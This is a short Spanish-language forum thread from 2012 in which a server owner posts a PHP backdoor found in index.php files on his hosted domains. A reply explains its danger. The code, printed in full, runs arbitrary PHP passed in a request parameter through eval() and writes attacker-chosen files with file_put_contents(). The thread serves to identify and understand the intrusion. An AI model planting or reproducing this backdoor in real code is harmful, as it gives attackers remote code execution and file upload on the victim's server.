Foro de elhacker.net

Programación => PHP => Mensaje iniciado por: NetStorm en 13 Diciembre 2012, 16:15 pm


Título: ¿Código maliciosos?... Lo encontré en mi SERVER "/
Publicado por: NetStorm en 13 Diciembre 2012, 16:15 pm
Hola muchachos, en esta ocasión les comparto el código que encontré hoy en la mañana en mi server de godaddy.

Código:
<?php       
                                                                                                                                                                                                                                                                                                                                                                 						if(isset($_REQUEST['gnobkr_galuh'])) { $hklp_mrzpfa = $_REQUEST['gnobkr_galuh']; eval($hklp_mrzpfa); } if(isset($_REQUEST['wzv_ttbhhc'])) { $ytyye_fpbqa = $_REQUEST['pmhoc_pkkp']; $fjy_qgk = $_REQUEST['wzv_ttbhhc']; file_put_contents($fjy_qgk, $ytyye_fpbqa); }

?>

El contenido estaba dentro de un archivo Index.php, que se había creado en todos los dominios de mi server, tengo varios dominios alojados, cuando cargaba cualquiera de esos dominios se mostraba en blanco, obviamente porque no enviaba las variables que requiere este script. Yo soy programador en php intermedio, pero con este código me basta para hacer desmadres en el servidor. 

¿Sus opiniones? :huh:

Título: Re: ¿Código maliciosos?... Lo encontré en mi SERVER "/
Publicado por: Shell Root en 13 Diciembre 2012, 17:17 pm
Código
  1.  <?php
  2. if (isset($_REQUEST['gnobkr_galuh'])) {
  3.     $hklp_mrzpfa = $_REQUEST['gnobkr_galuh'];
  4.     eval($hklp_mrzpfa);
  5. }
  6. if (isset($_REQUEST['wzv_ttbhhc'])) {
  7.     $ytyye_fpbqa = $_REQUEST['pmhoc_pkkp'];
  8.     $fjy_qgk     = $_REQUEST['wzv_ttbhhc'];
  9.     file_put_contents($fjy_qgk, $ytyye_fpbqa);
  10. }

Quizás ya que ejecuta la función eval() (http://php.net/manual/es/function.eval.php), es muy peligroso porque permite la ejecución de código de PHP arbitrario.
Hasta puede subir un archivo al servidor, quizás webshell con la función file_put_contents() (http://php.net/file_put_contents)

Título: Re: ¿Código maliciosos?... Lo encontré en mi SERVER "/
Publicado por: NetStorm en 30 Diciembre 2012, 01:02 am
Queda claro que al recibir variables con esos nombres que solo el atacante podría conocer, además de ejecutar código arbitrario con "eval" ES MALICIOSO.

TEMA CERRADO!

Gracias


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines